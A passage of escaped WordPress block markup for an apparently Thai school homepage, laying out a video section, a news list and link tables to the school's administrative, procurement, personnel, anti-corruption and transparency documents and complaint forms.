{\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://www.facebook.com/profile.php?id=61556083436494&amp;sk=videos\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"abc6c06d\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"b0641f20\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"id\":260,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" class=\"wp-image-260\"/></figure>\n<!-- /wp:image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1vuZFLIWRkwFNN4GX0n7enJwyg8eDIzBQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vuZFLIWRkwFNN4GX0n7enJwyg8eDIzBQ/view?usp=share_link\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1ics-Zh-M3PJmB2iudN_y7YVcdRFtVcLi/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ics-Zh-M3PJmB2iudN_y7YVcdRFtVcLi/view?usp=drive_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong></td></tr></tbody></table><figcaption class=\"wp-element-caption\">      - obec content center                      </figcaption></figure>\n<!-- /wp:table -->\n\n<!-- wp:paragraph -->\n<p>    </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://www.facebook.com/share/p/sdXD4yi68yYAMbpR/\" data-type=\"link\" data-id=\"https://www.facebook.com/share/p/sdXD4yi68yYAMbpR/\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\" data-type=\"link\" data-id=\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_91838d-0f\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 